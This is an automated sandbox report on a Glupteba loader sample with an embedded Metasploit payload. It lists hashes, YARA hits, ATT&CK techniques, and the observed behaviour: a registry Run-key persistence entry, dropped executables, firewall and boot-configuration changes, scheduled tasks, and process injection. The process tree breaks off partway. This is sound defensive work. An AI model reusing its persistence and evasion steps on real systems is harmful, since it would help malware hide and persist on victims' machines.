glupteba | 8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d

General

Target

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Size

3.9MB
MD5

2abec5db341e67e7d366b614d1f558bd
SHA1

1ec1785639296fd6c0772d1664919ae2e2e10f1b
SHA256

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d
SHA512

38dffbc65f4622590c2cd169b59e958eedc9f689c456d0bdfb005211868984fc5a966fb25a91cd81954a0751cf3d56216133e9144149628f666ccc1a518da9cc
SSDEEP

98304:ARyOG6V/RGNgGIvsBeNpoftIjbLNRv2aXcPIabh+QLyI:ALvPUlInLdcrV+sh

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4852-133-0x0000000001490000-0x0000000001C95000-memory.dmp	family_glupteba
behavioral2/memory/4852-134-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/4852-136-0x0000000001490000-0x0000000001C95000-memory.dmp	family_glupteba
behavioral2/memory/4852-137-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2468-138-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2468-145-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/4656-147-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/4656-153-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 2120 created 4852	2120	svchost.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
PID 2120 created 4656	2120	svchost.exe	csrss.exe
PID 2120 created 4656	2120	svchost.exe	csrss.exe
PID 2120 created 4656	2120	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

4656 csrss.exe
2380 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

4520 netsh.exe

pid	process
4656	csrss.exe
2380	patch.exe

pid	process
4520	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RoughMoon = "\"C:\\Windows\\rss\\csrss.exe\""	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1080 bcdedit.exe

pid	process
1080	bcdedit.exe

Drops file in Windows directory 2 IoCs

Processes:

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
File opened for modification	C:\Windows\rss	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe

Program crash 56 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4288	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4152	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
1404	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2224	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2580	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
3296	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2212	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
1064	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4148	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2308	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
3512	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
3484	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
3956	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
3468	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
828	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
1796	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2044	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
1144	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2452	4852	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4400	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
5052	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4248	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4360	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4436	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
1644	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2888	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
1716	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2608	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4428	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2208	2468	WerFault.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4324	4656	WerFault.exe	csrss.exe
1516	4656	WerFault.exe	csrss.exe
2252	4656	WerFault.exe	csrss.exe
1804	4656	WerFault.exe	csrss.exe
3868	4656	WerFault.exe	csrss.exe
2376	4656	WerFault.exe	csrss.exe
1584	4656	WerFault.exe	csrss.exe
4788	4656	WerFault.exe	csrss.exe
1820	4656	WerFault.exe	csrss.exe
4748	4656	WerFault.exe	csrss.exe
4512	4656	WerFault.exe	csrss.exe
4404	4656	WerFault.exe	csrss.exe
4152	4656	WerFault.exe	csrss.exe
1660	4656	WerFault.exe	csrss.exe
4704	4656	WerFault.exe	csrss.exe
4756	4656	WerFault.exe	csrss.exe
116	4656	WerFault.exe	csrss.exe
4636	4656	WerFault.exe	csrss.exe
4888	4656	WerFault.exe	csrss.exe
3844	4656	WerFault.exe	csrss.exe
4368	4656	WerFault.exe	csrss.exe
2848	4656	WerFault.exe	csrss.exe
4852	4656	WerFault.exe	csrss.exe
548	4656	WerFault.exe	csrss.exe
748	4656	WerFault.exe	csrss.exe
3124	4656	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4972 schtasks.exe
2424 schtasks.exe

pid	process
4972	schtasks.exe
2424	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.execsrss.exe

pid	process
4852	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4852	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
4656	csrss.exe
4656	csrss.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	4852	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Token: SeImpersonatePrivilege	4852	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
Token: SeTcbPrivilege	2120	svchost.exe
Token: SeTcbPrivilege	2120	svchost.exe
Token: SeBackupPrivilege	2120	svchost.exe
Token: SeRestorePrivilege	2120	svchost.exe
Token: SeBackupPrivilege	2120	svchost.exe
Token: SeRestorePrivilege	2120	svchost.exe
Token: SeBackupPrivilege	2120	svchost.exe
Token: SeRestorePrivilege	2120	svchost.exe
Token: SeBackupPrivilege	2120	svchost.exe
Token: SeRestorePrivilege	2120	svchost.exe
Token: SeSystemEnvironmentPrivilege	4656	csrss.exe
Token: SeBackupPrivilege	2120	svchost.exe
Token: SeRestorePrivilege	2120	svchost.exe
Token: SeBackupPrivilege	2120	svchost.exe
Token: SeRestorePrivilege	2120	svchost.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

svchost.exe8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.execmd.execsrss.exe

description	pid	process	target process
PID 2120 wrote to memory of 2468	2120	svchost.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
PID 2120 wrote to memory of 2468	2120	svchost.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
PID 2120 wrote to memory of 2468	2120	svchost.exe	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
PID 2468 wrote to memory of 4920	2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe	cmd.exe
PID 2468 wrote to memory of 4920	2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe	cmd.exe
PID 4920 wrote to memory of 4520	4920	cmd.exe	netsh.exe
PID 4920 wrote to memory of 4520	4920	cmd.exe	netsh.exe
PID 2468 wrote to memory of 4656	2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe	csrss.exe
PID 2468 wrote to memory of 4656	2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe	csrss.exe
PID 2468 wrote to memory of 4656	2468	8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe	csrss.exe
PID 2120 wrote to memory of 4972	2120	svchost.exe	schtasks.exe
PID 2120 wrote to memory of 4972	2120	svchost.exe	schtasks.exe
PID 2120 wrote to memory of 2424	2120	svchost.exe	schtasks.exe
PID 2120 wrote to memory of 2424	2120	svchost.exe	schtasks.exe
PID 2120 wrote to memory of 2380	2120	svchost.exe	patch.exe
PID 2120 wrote to memory of 2380	2120	svchost.exe	patch.exe
PID 4656 wrote to memory of 1080	4656	csrss.exe	bcdedit.exe
PID 4656 wrote to memory of 1080	4656	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
"C:\Users\Admin\AppData\Local\Temp\8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 328
2⤵
- Program crash
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 352
2⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
